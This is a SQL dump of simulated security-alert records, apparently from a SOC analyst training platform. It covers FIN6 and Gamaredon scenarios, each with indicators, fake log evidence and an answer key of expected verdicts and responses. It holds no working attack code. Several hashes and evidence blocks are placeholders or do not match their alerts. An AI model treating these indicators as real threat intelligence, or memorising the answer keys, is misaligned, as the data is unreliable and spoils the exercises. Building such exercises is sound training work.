(461, 'Unauthorized Lateral Movement Detected', 'high', 'Anomaly Detection Systems', 'An unauthorized lateral movement has been detected involving compromised credentials and malware. The attacker, identified as FIN6, is attempting to move laterally through the network, targeting point-of-sale (POS) systems and databases. The activity involves the use of specific malware and compromised user accounts.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:00Z\",\"src_ip\":\"195.22.26.189\",\"dest_ip\":\"192.168.1.15\",\"src_user\":\"j.doe\",\"compromised_credential\":true,\"malware_hash\":\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\",\"malware_filename\":\"pos_grabber.exe\",\"activity\":{\"description\":\"Lateral movement attempt using compromised credentials\",\"target_system\":\"POS server\",\"method\":\"SMB protocol over port 445\"}}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"195.22.26.189\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with FIN6 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal POS server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account flagged for unusual activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Known hash of malware used by FIN6\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"pos_grabber.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Executable associated with POS system attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.071Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:00Z\\\",\\\"src_ip\\\":\\\"195.22.26.189\\\",\\\"dest_ip\\\":\\\"192.168.1.15\\\",\\\"src_user\\\":\\\"j.doe\\\",\\\"compromised_credential\\\":true,\\\"malware_hash\\\":\\\"3b2e890d4f1a4e6d8a7c1f2b3e4d5c6f\\\",\\\"malware_filename\\\":\\\"pos_grabber.exe\\\",\\\"activity\\\":{\\\"description\\\":\\\"Lateral movement attempt using compromised credentials\\\",\\\"target_system\\\":\\\"POS server\\\",\\\"method\\\":\\\"SMB protocol over port 445\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(462, 'Exfiltration of Credit Card Data', 'high', 'Data Loss Prevention (DLP) Tools', 'FIN6 has initiated the exfiltration of previously scraped credit card data to an external server, marking the completion of their primary objective in this attack cycle.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:05Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"185.199.108.153\",\"destination_domain\":\"malicious-server.com\",\"protocol\":\"HTTPS\",\"file_name\":\"cc_data_dump.zip\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john.doe\",\"alert_trigger\":\"DLP: Credit Card Data Exfiltration Detected\",\"data_volume\":\"25MB\",\"process_name\":\"python.exe\",\"process_id\":4567}', '2026-01-05 00:10:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration activities by FIN6.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"malicious-server.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain frequently used by FIN6 for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cc_data_dump.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File matches pattern for exfiltration data dumps.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known FIN6 malware operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:31:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:30:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:29:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:28:19.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:05Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"destination_domain\\\":\\\"malicious-server.com\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"cc_data_dump.zip\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"john.doe\\\",\\\"alert_trigger\\\":\\\"DLP: Credit Card Data Exfiltration Detected\\\",\\\"data_volume\\\":\\\"25MB\\\",\\\"process_name\\\":\\\"python.exe\\\",\\\"process_id\\\":4567}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(463, 'Initial Access via Weaponized Word Document', 'high', 'Email Gateway Logs', 'A phishing email was detected containing a weaponized Word document. The email was designed to appear as an official military communication, enticing the recipient to open the attachment. Upon opening, the document initiates a template injection exploit aimed at gaining initial access to the target\'s network.', 'Phishing', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:30Z\",\"email_id\":\"d5f7a8e3-9abc-4567-80d5-5d3fa8765b41\",\"source_ip\":\"91.121.92.36\",\"destination_ip\":\"192.168.1.45\",\"sender_email\":\"info@military-ops.co\",\"recipient_email\":\"j.doe@target-organization.com\",\"subject\":\"Urgent: Military Operations Briefing\",\"attachment\":{\"filename\":\"Operations_Update.docx\",\"hash\":\"e9b1f8b9f8a7e4c9c9b9d8c8d7d6e5a4\"},\"malware_family\":\"Gamaredon\",\"exploit_technique\":\"Template Injection\"}', '2026-01-05 02:59:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"91.121.92.36\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Gamaredon operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"info@military-ops.co\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Email domain used in previous phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e9b1f8b9f8a7e4c9c9b9d8c8d7d6e5a4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with Gamaredon malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Weaponized Word Document\",\"date\":\"2026-02-01T20:32:19.073Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(464, 'Execution of Embedded VBScript Backdoor', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the Word document, a concealed VBScript backdoor is executed, connecting to a command and control server, enabling remote command execution and persistence within the network.', 'Code Execution', 'T1059.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"event_type\":\"code_execution\",\"host_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"process_name\":\"winword.exe\",\"script_name\":\"malicious_script.vbs\",\"script_hash\":\"3a4f1b2c5e6d7f8g9h10i11j12k13l14m15n16o17p\",\"c2_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.vbs\",\"command\":\"cscript.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.vbs\",\"action\":\"process_created\"}', '2026-01-05 02:59:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a4f1b2c5e6d7f8g9h10i11j12k13l14m15n16o17p\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with VBScript backdoor\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.vbs\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as a malicious VBScript backdoor\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(465, 'Data Exfiltration via Encrypted Channels', 'high', 'Network Traffic Analysis', 'The attackers have initiated data exfiltration by encrypting sensitive military data and transferring it through a secure TLS channel to an external server. The data was gathered using a deployed VBScript backdoor, enabling discreet exfiltration.', 'Data Theft', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:53:21Z\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"203.0.113.77\",\"src_port\":\"44321\",\"dest_port\":\"443\",\"protocol\":\"TLS\",\"username\":\"jdoe\",\"filename\":\"military_data_enc.zip\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"transferred\",\"encryption\":\"AES-256\",\"malware_name\":\"VBScript_Backdoor\"}', '2026-01-05 02:59:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with VBScript_Backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"military_data_enc.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encrypted file potentially containing sensitive data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Activity Logs\",\"verdict\":\"internal\",\"details\":\"User credentials potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(466, 'Initial Access: Trojanized Software Update Detected', 'high', 'Software Update Logs', 'A trojanized software update for the ICS system has been detected. This update was distributed by attackers to gain initial access into the network by compromising the supply chain of the legitimate software provider.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:32:10Z\",\"event_type\":\"software_update\",\"software_name\":\"ICS_Control_Update\",\"version\":\"v2.3.4\",\"update_status\":\"completed\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"destination_user\":\"admin\",\"file_path\":\"/usr/local/ics_control/update_v2.3.4.exe\",\"signature_status\":\"invalid\",\"detected_malware\":\"Trojan.IcsMalware\",\"internal_ip_range\":\"192.168.0.0/16\"}', '2026-01-05 03:02:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of target device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known trojanized update.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/usr/local/ics_control/update_v2.3.4.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file path for trojanized software.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:32:10Z\\\",\\\"event_type\\\":\\\"software_update\\\",\\\"software_name\\\":\\\"ICS_Control_Update\\\",\\\"version\\\":\\\"v2.3.4\\\",\\\"update_status\\\":\\\"completed\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"file_path\\\":\\\"/usr/local/ics_control/update_v2.3.4.exe\\\",\\\"signature_status\\\":\\\"invalid\\\",\\\"detected_malware\\\":\\\"Trojan.IcsMalware\\\",\\\"internal_ip_range\\\":\\\"192.168.0.0/16\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.076Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 